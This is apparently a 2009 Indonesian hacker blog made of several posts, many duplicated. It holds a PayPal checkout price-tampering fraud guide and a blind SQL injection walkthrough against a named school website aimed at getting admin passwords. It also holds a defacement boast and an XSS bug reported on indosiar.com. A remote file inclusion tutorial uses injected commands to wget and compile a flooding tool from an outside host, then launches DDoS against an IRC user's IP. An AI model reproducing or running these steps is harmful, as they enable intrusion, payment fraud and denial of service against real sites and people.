Thanks to: kiddies dan ycl dari Yogyacarderlink
Sumber: yogyacarderlink.web.id
Jumat, 02 Oktober 2009
UserScript Isengin temen yang pake Gmail
Udah lama gak update blog jelek ini selama 2 hari (2 hari itu lama apa bentar ya?)
OK, saya langsung aja, saya melihat SpyroZone Update lagi! (Cihuuy! Akhirnya!) setelah beberapa hari yang lalu yaitu sekitar 2 bulan yang lalu (2 bulan itu bentar apa lama seeh???) dan Updatenya adalah: Malicious User Script! Hati-hati dengan Browser anda, karena anda bisa terbunuh olehnya...
Sebelum kita sharing Malicious User Script, Apakah itu UserScript?
Menurut Wikipedia ala saya (Halah...): User Script adalah JavaScript yang sudah diset oleh pengguna untuk Browsernya, supaya JavaScript itu aktif PERTAMA KALI (PERTAMAX! katanya Kaskuser) di beberapa situs yang diinginkan.
Contoh penggunaan User Script:
- Mengganti tampilan Google jadi lebih indah
- Mengganti tampilan Gmail jadi lebih indah
- Menambahkan Fasilitas di Blogger yaitu Emoticons
- Bot untuk MafiaWars di Facebook (biar maennya otomatis, kita gak perlu maen, biarkan bot itu yang mengerjakannya ^_^)
- dan lain-lain, liat aja di userscripts.org
Browser yang Support User Script:
- Opera: Secara Default udah ada...
- Mozilla Firefox: Pake Add-Ons Greasemonkey
- Internet Explorer, Google Chrome, Safari: Tanya om google tentang add-onsnya
Taukah anda bahwa kita bisa memakai UserScript untuk hal yang sangat MENGERIKAN! Hahahahahaha!!!
Misalnya: Windows bisa macet gara-gara buka tab terus, atau yang kita bicarakan sekarang, yaitu: INBOX GMAIL BOMBER (Bikin-bikin ndiri namanya... ^_^)
OK, source code didapat dari SpyroKiD pastinyah!!!
SOURCE CODE
Yea, segitu aja dulu yea...
OK, Stay on your channel in darknezzhacker.co.cc
There's more tips and trick or tutorial in Darkness Hacker...
So stay Hacking! ;)
---END---
Sumber: spyrozone.net
OK, saya langsung aja, saya melihat SpyroZone Update lagi! (Cihuuy! Akhirnya!) setelah beberapa hari yang lalu yaitu sekitar 2 bulan yang lalu (2 bulan itu bentar apa lama seeh???) dan Updatenya adalah: Malicious User Script! Hati-hati dengan Browser anda, karena anda bisa terbunuh olehnya...
Sebelum kita sharing Malicious User Script, Apakah itu UserScript?
Menurut Wikipedia ala saya (Halah...): User Script adalah JavaScript yang sudah diset oleh pengguna untuk Browsernya, supaya JavaScript itu aktif PERTAMA KALI (PERTAMAX! katanya Kaskuser) di beberapa situs yang diinginkan.
Contoh penggunaan User Script:
- Mengganti tampilan Google jadi lebih indah
- Mengganti tampilan Gmail jadi lebih indah
- Menambahkan Fasilitas di Blogger yaitu Emoticons
- Bot untuk MafiaWars di Facebook (biar maennya otomatis, kita gak perlu maen, biarkan bot itu yang mengerjakannya ^_^)
- dan lain-lain, liat aja di userscripts.org
Browser yang Support User Script:
- Opera: Secara Default udah ada...
- Mozilla Firefox: Pake Add-Ons Greasemonkey
- Internet Explorer, Google Chrome, Safari: Tanya om google tentang add-onsnya
Taukah anda bahwa kita bisa memakai UserScript untuk hal yang sangat MENGERIKAN! Hahahahahaha!!!
Misalnya: Windows bisa macet gara-gara buka tab terus, atau yang kita bicarakan sekarang, yaitu: INBOX GMAIL BOMBER (Bikin-bikin ndiri namanya... ^_^)
OK, source code didapat dari SpyroKiD pastinyah!!!
SOURCE CODE
Yea, segitu aja dulu yea...
OK, Stay on your channel in darknezzhacker.co.cc
There's more tips and trick or tutorial in Darkness Hacker...
So stay Hacking! ;)
---END---
Sumber: spyrozone.net
Selasa, 29 September 2009
Cara ganti harga Paypal jadi $0.01
Jadi begini, kita bisa bayar beli barang dengan paypal tapi diganti harganya jadi $0.01...
Ini langkahnya:
1. Lalu cari situs yang jualan barang di internet yang pembayarannya menggunakan PayPal, lalu klik “Buy”
2. Trus klik "Checkout with PayPal"
3. Dan saat keluar teks "You are being automatically forwarded to PayPal's site" lalu cari di browser Mozilla Anda pada menu “View” trus "Page Source" atau tekan “ctrl+U”
4. Simpan source teks tersebut dengan klik "File" lalu "Save page as..."
5. Putuskan koneksi ke internet dan buka kembali file source yang telah Anda “save” tadi, lalu ganti – harga ="49.95 (atau harga barang)" -- dengan – harga ="00.01" –
6. Trus “save”
7. Lalu klik kanan file source tadi dengan "Open with" -- "FireFox"
8. Selanjutnya terserah Anda …
Selamat Mencoba …
Semoga bermanfaat
Gw gak bertanggung jawab kalo ada kesalahan atau terjadi kejadian
---END---
Thx to: Kimmo (heckeria.net)
Ini langkahnya:
1. Lalu cari situs yang jualan barang di internet yang pembayarannya menggunakan PayPal, lalu klik “Buy”
2. Trus klik "Checkout with PayPal"
3. Dan saat keluar teks "You are being automatically forwarded to PayPal's site" lalu cari di browser Mozilla Anda pada menu “View” trus "Page Source" atau tekan “ctrl+U”
4. Simpan source teks tersebut dengan klik "File" lalu "Save page as..."
5. Putuskan koneksi ke internet dan buka kembali file source yang telah Anda “save” tadi, lalu ganti – harga ="49.95 (atau harga barang)" -- dengan – harga ="00.01" –
6. Trus “save”
7. Lalu klik kanan file source tadi dengan "Open with" -- "FireFox"
8. Selanjutnya terserah Anda …
Selamat Mencoba …
Semoga bermanfaat
Gw gak bertanggung jawab kalo ada kesalahan atau terjadi kejadian
---END---
Thx to: Kimmo (heckeria.net)
Senin, 28 September 2009
Blind SQL Injection
Akhirnya, setelah 2 hari mandul karena sibuk deface sana-sini, tapi gak ada hasil... :-(
Yaudah lah, karena saya lebih suka dapet tantangan "deface 5 web dalam 1 bulan! INGAT! jangan pake XSS!!!" daripada ngga, soalnya gak tau mo ngapain, selain blogging dan forumming, yep, secara tidak langsung, Indeves telah memberikan tantangan kepada saya minimal 2 web kedeface tanpa menggunakan XSS!
OK, back to topic aja deh...
Apa sich Blind SQL Injection tu?
Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut...
disini GT memakai command :
mid()= hampir sama fungsinya dengan substring()
char()= adalah peubah dari karakter
lanjut..
ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg..
kalau version 4..kita memakai blind,karena v4 tidak support query information_schema
kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw
lanjut...
Target: http://www.smanti.com (thx to bejamz udah ngasih target :)
1.PENGETESAN BUG
Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1
http://www.smanti.com/berita.php?id=5 and 1=0 false
http://www.smanti.com/berita.php?id=5 and 1=1 true
eh ternyata ada bug nya...
lanjut....
2.BLIND INJECT
Query yg dipakai: and mid(user(),1,1)=CHAR(65)
saya jelaskan sedikit deh..
mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut
sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
kenapa kita mulai dengan 65 ?
karena "65" adalah "A" dalam ascii...
lanjut..
mari kita masukkan
http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)
ternyata hasilnya masih false (beritanya hilang)
berarti value yg kita masukkan salah..
tinggal tambah value na..jadi..
http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) masih false
http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) masih false
http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) masih false
http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) masih false juga..
dst sampe kita menemukan keadaan true(beritanya muncul kembali)
kebetulan ada di char(83)
http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83) akhirnya true..
cape?masih kuat?hahaha..trial n error...
lanjut..
kita tambain value na..
http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)
adakah perbedaan nya?
yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..
gini nih..
1,1 = value pertama user
1,2 = value kedua user
1,3 = value ketiga user
dst
dan 83 adalah nilai true,lalu kita tambahkan..
http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)
http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)
http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)
dst.. sampe dpet yg true..
ternyata yg true ngumpet di value 77
http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)
lanjutin trus langkah2na..
cari value k 3 user..
http://www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)
eh langsung ktemu..hehehe..
lanjut value k 4..
http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)
http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)
http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)
ternyata ktemu di value 78..
http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)
lanjut trus aja...
cape gw..
pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table
http://www.piclist.com/techref/ascii.htm
stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN
nah udah hampir ktebak user name nya..kerjain ndiri y..okey
nah..gmana kalo mw dapet password na?
kita rubah value
user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..
jadi
http://www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)
cari lagi..sama kayak cari user tadi..harus sabar..
ulangi sampai dapat true ..
tambain value na..wkwkwkw..
dan rubah value database() untuk mencari value lainnya..
hingga mendapat admin password dan db password
.
metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)
akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection...hehehe...
okey sampe sini aja ah..cape ngetik..wkwkwkw
slamat mencoba wkwkwkw...
Thanks smua..duduw..wkwkw sekian...
---
Ditulis:Neo_Gabriel
Sumber: senot
Yaudah lah, karena saya lebih suka dapet tantangan "deface 5 web dalam 1 bulan! INGAT! jangan pake XSS!!!" daripada ngga, soalnya gak tau mo ngapain, selain blogging dan forumming, yep, secara tidak langsung, Indeves telah memberikan tantangan kepada saya minimal 2 web kedeface tanpa menggunakan XSS!
OK, back to topic aja deh...
Apa sich Blind SQL Injection tu?
Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut...
disini GT memakai command :
mid()= hampir sama fungsinya dengan substring()
char()= adalah peubah dari karakter
lanjut..
ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg..
kalau version 4..kita memakai blind,karena v4 tidak support query information_schema
kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw
lanjut...
Target: http://www.smanti.com (thx to bejamz udah ngasih target :)
1.PENGETESAN BUG
Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1
http://www.smanti.com/berita.php?id=5 and 1=0 false
http://www.smanti.com/berita.php?id=5 and 1=1 true
eh ternyata ada bug nya...
lanjut....
2.BLIND INJECT
Query yg dipakai: and mid(user(),1,1)=CHAR(65)
saya jelaskan sedikit deh..
mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut
sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
kenapa kita mulai dengan 65 ?
karena "65" adalah "A" dalam ascii...
lanjut..
mari kita masukkan
http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)
ternyata hasilnya masih false (beritanya hilang)
berarti value yg kita masukkan salah..
tinggal tambah value na..jadi..
http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) masih false
http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) masih false
http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) masih false
http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) masih false juga..
dst sampe kita menemukan keadaan true(beritanya muncul kembali)
kebetulan ada di char(83)
http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83) akhirnya true..
cape?masih kuat?hahaha..trial n error...
lanjut..
kita tambain value na..
http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)
adakah perbedaan nya?
yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..
gini nih..
1,1 = value pertama user
1,2 = value kedua user
1,3 = value ketiga user
dst
dan 83 adalah nilai true,lalu kita tambahkan..
http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)
http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)
http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)
dst.. sampe dpet yg true..
ternyata yg true ngumpet di value 77
http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)
lanjutin trus langkah2na..
cari value k 3 user..
http://www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)
eh langsung ktemu..hehehe..
lanjut value k 4..
http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)
http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)
http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)
ternyata ktemu di value 78..
http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)
lanjut trus aja...
cape gw..
pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table
http://www.piclist.com/techref/ascii.htm
stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN
nah udah hampir ktebak user name nya..kerjain ndiri y..okey
nah..gmana kalo mw dapet password na?
kita rubah value
user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..
jadi
http://www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)
cari lagi..sama kayak cari user tadi..harus sabar..
ulangi sampai dapat true ..
tambain value na..wkwkwkw..
dan rubah value database() untuk mencari value lainnya..
hingga mendapat admin password dan db password
.
metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)
akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection...hehehe...
okey sampe sini aja ah..cape ngetik..wkwkwkw
slamat mencoba wkwkwkw...
Thanks smua..duduw..wkwkw sekian...
---
Ditulis:Neo_Gabriel
Sumber: senot
Minggu, 27 September 2009
Saya mendukung Indonesian Security Confrence
Aku mendukung Idsecconf 2009!
Yeah, saya memang sangat mendukungnya...
Saya liat di idsecconf.org banyak blog yang sejenis sama blog Darkness Hacker ini. Jadi saya ikut mendukung aja deh (tapi gak tau ikut kesana apa ngga... ^_^)
OK, kalo kalian mau dukung pergi ke 2009.idsecconf.org dan klik Dukung Kami, trus copas code banner yang dikehendaki, dan jangan lupa kirim email pemberitahuan ke idsecconf[at]echo[dot]or[dot]id
Udah deh gitu doank
Jumat, 25 September 2009
NEW DEFACED GUESTBOOK!!!
YEAH! Akhirnya Cybernet Warrior beraksi untuk kesekian kalinya (cuma dua kali sih... ^_^)
Wokeh, Saya akan sedikit pamer...
Shoutz to: J4mbi H4ck3r
HACKED GUESTBOOK
Xixixixi...
Maaf yaa Malaysia...
---END---
Wokeh, Saya akan sedikit pamer...
Shoutz to: J4mbi H4ck3r
HACKED GUESTBOOK
Xixixixi...
Maaf yaa Malaysia...
---END---
Secret Code HP Nokia
Berikut ini adalah kunci kode tombol rahasia yang dapat anda jalankan sendiri dengan mengetiknya di keypad hp ponsel anda yang bermerek Nokia baik yang cdma maupun yang gsm.
1. Melihat IMEI (International Mobile Equipment Identity)
Caranya tekan * # 0 6 #
2. Melihat versi software, tanggal pembuatan softwre dan jenis kompresi software
Caranya tekan * # 0 0 0 0 #
Jika tidak berhasil coba pencet * # 9 9 9 9 #
3. Melihat status call waiting
Caranya tekan * # 4 3 #
4. Melihat nomor / nomer private number yang menghubungi ponsel anda
Caranya tekan * # 3 0 #
5. Menampilkan nomer pengalihan telepon all calls
Caranya tekan * # 2 1 #
6. Melihat nomor penelepon pada pengalihan telepon karena tidak anda jawab (call divert on)
Caranya tekan * # 6 1 #
7. Melihat nomor penelepon pada pengalihan telepon karena di luar jangkauan (call divert on)
Caranya tekan * # 6 2 #
8. Melihat nomor penelepon pada pengalihan telepon karena sibuk (call divert on)
Caranya tekan * # 6 7 #
9. Merubah logo operator pada nokia type 3310 dan 3330
Caranya tekan * # 6 7 7 0 5 6 4 6 #
10. Menampilkan status sim clock
Caranya tekan * # 7 4 6 0 2 5 6 2 5 #
11. Berpindah ke profil profile ponsel anda
Caranya tekan tombol power off tanpa ditahan
12. Merubah seting hp nokia ke default atau pabrikan
Caranya tekan * # 7 7 8 0 #
13. Melakukan reset timer ponsel dan skor game ponsel nokia
Caranya tekan * # 7 3 #
14. Melihat status call waiting
Caranya tekan * # 4 3 #
15. Melihat kode pabrik atau factory code
Caranya tekan * # 7 7 6 0 #
16. Menampilkan serial number atau nomer seri hp, tanggal pembuatan, tanggal pembelian, tanggal servis terakhir, transfer user data. Untuk keluar ponsel harus direset kembali.
Caranya tekan * # 92702689 #
17. Melihat kode pengamanan ponsel anda
Caranya tekan * # 2 6 4 0 #
18. Melihat alamat ip perangkat keras bluetooth anda
Caranya tekan * # 2 8 2 0 #
19. Mengaktifkan EFR dengan kualitas suara terbaik namun boros energi batere. Untuk mematikan menggunakan kode yang sama.
Caranya tekan * # 3 3 7 0 #
20. Mengaktifkan EFR dengan kualitas suara terendah namun hemat energi batere. Untuk mematikan menggunakan kode yang sama.
Caranya tekan * # 4 7 2 0 #
21. Menuju isi phone book dengan cepat di handphone nokia
Caranya tekan nomer urut lalu # contoh : 150#
22. Mengalihkan panggilan ke nomor yang dituju untuk semua panggilan
Caranya tekan * * 2 1 * Nomor Tujuan #
23. Mengalihkan panggilan ke nomor yang dituju untuk panggilan yang tidak terjawab
Caranya tekan * * 6 1 * Nomor Tujuan #
24. Mengalihkan panggilan ke nomor yang dituju untuk panggilan ketika telepon hp anda sedang sibuk
Caranya tekan * * 6 7 * Nomor Tujuan #
Keterangan Tambahan :
- Kode diinput tanpa spasi
- Ada kode-kode nokia yang berlaku pada tipe tertentu saja
---END---
Sumber: yogiehacker.blogspot.com
Penulis: Yogie
1. Melihat IMEI (International Mobile Equipment Identity)
Caranya tekan * # 0 6 #
2. Melihat versi software, tanggal pembuatan softwre dan jenis kompresi software
Caranya tekan * # 0 0 0 0 #
Jika tidak berhasil coba pencet * # 9 9 9 9 #
3. Melihat status call waiting
Caranya tekan * # 4 3 #
4. Melihat nomor / nomer private number yang menghubungi ponsel anda
Caranya tekan * # 3 0 #
5. Menampilkan nomer pengalihan telepon all calls
Caranya tekan * # 2 1 #
6. Melihat nomor penelepon pada pengalihan telepon karena tidak anda jawab (call divert on)
Caranya tekan * # 6 1 #
7. Melihat nomor penelepon pada pengalihan telepon karena di luar jangkauan (call divert on)
Caranya tekan * # 6 2 #
8. Melihat nomor penelepon pada pengalihan telepon karena sibuk (call divert on)
Caranya tekan * # 6 7 #
9. Merubah logo operator pada nokia type 3310 dan 3330
Caranya tekan * # 6 7 7 0 5 6 4 6 #
10. Menampilkan status sim clock
Caranya tekan * # 7 4 6 0 2 5 6 2 5 #
11. Berpindah ke profil profile ponsel anda
Caranya tekan tombol power off tanpa ditahan
12. Merubah seting hp nokia ke default atau pabrikan
Caranya tekan * # 7 7 8 0 #
13. Melakukan reset timer ponsel dan skor game ponsel nokia
Caranya tekan * # 7 3 #
14. Melihat status call waiting
Caranya tekan * # 4 3 #
15. Melihat kode pabrik atau factory code
Caranya tekan * # 7 7 6 0 #
16. Menampilkan serial number atau nomer seri hp, tanggal pembuatan, tanggal pembelian, tanggal servis terakhir, transfer user data. Untuk keluar ponsel harus direset kembali.
Caranya tekan * # 92702689 #
17. Melihat kode pengamanan ponsel anda
Caranya tekan * # 2 6 4 0 #
18. Melihat alamat ip perangkat keras bluetooth anda
Caranya tekan * # 2 8 2 0 #
19. Mengaktifkan EFR dengan kualitas suara terbaik namun boros energi batere. Untuk mematikan menggunakan kode yang sama.
Caranya tekan * # 3 3 7 0 #
20. Mengaktifkan EFR dengan kualitas suara terendah namun hemat energi batere. Untuk mematikan menggunakan kode yang sama.
Caranya tekan * # 4 7 2 0 #
21. Menuju isi phone book dengan cepat di handphone nokia
Caranya tekan nomer urut lalu # contoh : 150#
22. Mengalihkan panggilan ke nomor yang dituju untuk semua panggilan
Caranya tekan * * 2 1 * Nomor Tujuan #
23. Mengalihkan panggilan ke nomor yang dituju untuk panggilan yang tidak terjawab
Caranya tekan * * 6 1 * Nomor Tujuan #
24. Mengalihkan panggilan ke nomor yang dituju untuk panggilan ketika telepon hp anda sedang sibuk
Caranya tekan * * 6 7 * Nomor Tujuan #
Keterangan Tambahan :
- Kode diinput tanpa spasi
- Ada kode-kode nokia yang berlaku pada tipe tertentu saja
---END---
Sumber: yogiehacker.blogspot.com
Penulis: Yogie
Kamis, 24 September 2009
Bug XSS on Indosiar.com
Tadi lagi nonton BBF (Boys Before Fired Flooded Flowers) (1 detik kemudian mau muntah rasanya...) Trus saya lagi di depan komputer, lagi SoNet-ing (Social Networking) dan Blogging, dan muncul suatu niat yang sedikit jahat yaitu buka situsnya di: www.indosiar.com dan cek bugs XSS-nya (maklum, masi newbie) dan JERENG!!!
Ternyata di search engine-nya ada bug XSS-nya lhooo!!!
Bagi admin Indosiar.com supaya ngepatch Bug XSS-nya yaa...
---END---
Ternyata di search engine-nya ada bug XSS-nya lhooo!!!
Bagi admin Indosiar.com supaya ngepatch Bug XSS-nya yaa...
---END---
Facebook Hacking (Online di kompi tanpa terlihat online)
Kata kakak saya, kalo online aka OL di HP gak keliatan Online kalo di komputer...
Tapi, kalo OL di HP ngelag, gak cepet...
Nah, kalo kita online di Komputer tapi buka-nya HP, bisa kan???
Ok, saya kasih linknya: DISINI BOZZ
---END---
Tapi, kalo OL di HP ngelag, gak cepet...
Nah, kalo kita online di Komputer tapi buka-nya HP, bisa kan???
Ok, saya kasih linknya: DISINI BOZZ
---END---
DDoS Reloaded
Ini adalah Tutorial DDoS dari J4mbi H4ck3r
Dork: inurl:/index.php?name=PNphpBB2
Tutorial:
1. Misalnya dapet korban: http://www.defendersofmodan.net/index.php?name=PNphpBB2
2. Kemudian hapus/delete index.php?name=PNphpBB2 di url/browsing sehingga menjadi http://www.defendersofmodan.net
3. Masukkan bug ini di belakang situs tadi :
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
4. Masukkan file inject ini di belakang nya lagi :
http://www.geocities.com/jambihackerlinkcrew/sql.htm
Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&cmd=pwd
Jangan lupa memasukkan command Unix di ujungnya
5. Masukkan file tembak.c ini di belakang nya lagi :
http://www.freewebs.com/jambihackerlink/tembak.c
Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=wget http://www.freewebs.com/jambihackerlink/tembak.c -O /var/tmp/tembak.c
6. Kemudian Compile file tembak.c
http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=gcc -o /var/tmp/jambihackerlink /var/tmp/tembak.c
7. Utk mendapatkan IP target, buka Mirc trus join salah satu canel di Dalnet. Arahkan mouse ke salah satu nickname di canel itu trus klik kanan lalu pilih Whois
misal nya
ce_sweet83 is ~cute_83@202.155.150.70 * ce_cute
Kemudian kita cari keberadaan IP tersebut, misal nya http://www.dnsstuff.com/tools/whois.ch?ip=202.155.150.70
Ternyata target nya menggunakan ISP : Indosat Internet Service Providers
8. Skrg kita serang dgn DDOS supaya target nya Disconnect dari Dalnet (ingat, bandwith kamu harus lebih besar utk melakukan DDOS).
misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink ip port
http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink 202.155.150.70 22 atau 202.155.150.70 53
Tunggu beberapa saat....... otomatis target nya akan Disconnect dari Dalnet.
---END---
Penulis: J4mbi H4cker
Thanks to: J4mbi H4ck3r
Dork: inurl:/index.php?name=PNphpBB2
Tutorial:
1. Misalnya dapet korban: http://www.defendersofmodan.net/index.php?name=PNphpBB2
2. Kemudian hapus/delete index.php?name=PNphpBB2 di url/browsing sehingga menjadi http://www.defendersofmodan.net
3. Masukkan bug ini di belakang situs tadi :
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
4. Masukkan file inject ini di belakang nya lagi :
http://www.geocities.com/jambihackerlinkcrew/sql.htm
Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&cmd=pwd
Jangan lupa memasukkan command Unix di ujungnya
5. Masukkan file tembak.c ini di belakang nya lagi :
http://www.freewebs.com/jambihackerlink/tembak.c
Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=wget http://www.freewebs.com/jambihackerlink/tembak.c -O /var/tmp/tembak.c
6. Kemudian Compile file tembak.c
http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=gcc -o /var/tmp/jambihackerlink /var/tmp/tembak.c
7. Utk mendapatkan IP target, buka Mirc trus join salah satu canel di Dalnet. Arahkan mouse ke salah satu nickname di canel itu trus klik kanan lalu pilih Whois
misal nya
ce_sweet83 is ~cute_83@202.155.150.70 * ce_cute
Kemudian kita cari keberadaan IP tersebut, misal nya http://www.dnsstuff.com/tools/whois.ch?ip=202.155.150.70
Ternyata target nya menggunakan ISP : Indosat Internet Service Providers
8. Skrg kita serang dgn DDOS supaya target nya Disconnect dari Dalnet (ingat, bandwith kamu harus lebih besar utk melakukan DDOS).
misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink ip port
http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink 202.155.150.70 22 atau 202.155.150.70 53
Tunggu beberapa saat....... otomatis target nya akan Disconnect dari Dalnet.
---END---
Penulis: J4mbi H4cker
Thanks to: J4mbi H4ck3r
Rabu, 23 September 2009
Smiley JavaScript (100% Illegal)
Ini adalah Script Smiley yang saya ambil dari Shoutmix (Illegal kan?)
Nah, sekarang copas script ini ke Notepad lalu Upload ke Web Hosting anda...
var smileyList = [
[':)', 'www.shoutmix.com/smileys/smile.gif'],
[':(', 'www.shoutmix.com/smileys/sad.gif'],
[';)', 'www.shoutmix.com/smileys/wink.gif'],
[':D', 'www.shoutmix.com/smileys/grin.gif'],
[':P', 'www.shoutmix.com/smileys/tongue.gif'],
['B-)', 'www.shoutmix.com/smileys/cool.gif'],
[':">', 'www.shoutmix.com/smileys/blush.gif'],
[':((', 'www.shoutmix.com/smileys/cry.gif'],
['8-)', 'www.shoutmix.com/smileys/rolleyes.gif'],
['O_o', 'www.shoutmix.com/smileys/surprised.gif'],
['/:)', 'www.shoutmix.com/smileys/suspicious.gif'],
[':eek:', 'www.shoutmix.com/smileys/eek.gif'],
['>:)', 'www.shoutmix.com/smileys/twisted.gif'],
[':thumbsup:', 'www.shoutmix.com/smileys/thumbsup.gif'],
[':argh:', 'www.shoutmix.com/smileys/argh.gif'],
[':banghead:', 'www.shoutmix.com/smileys/banghead.gif'],
[':drool:', 'www.shoutmix.com/smileys/drool.gif'],
[':wise:', 'www.shoutmix.com/smileys/wise.gif'],
[':shrug:', 'www.shoutmix.com/smileys/shrug.gif'],
[':love:', 'www.shoutmix.com/smileys/love.gif'],
[':buttrock:', 'www.shoutmix.com/smileys/buttrock.gif'],
['^O^', 'www.shoutmix.com/smileys/notworthy.gif'],
];
Kalo anda mau bikin yang lain, tambahin aja kayak gini:
['(Teks yg ingin diganti emo)', '(url gambar emo)'],
Lalu, anda pasang JavaScript ini ke dalam Website yang ingin ditambahkan emoticons:
<script type="text/javascript" src="(URL JavaScript anda)"></script>
NAH! SEPERTI ITU RAHASIANYA!!!
---END---
Thanks to: Shoutmix
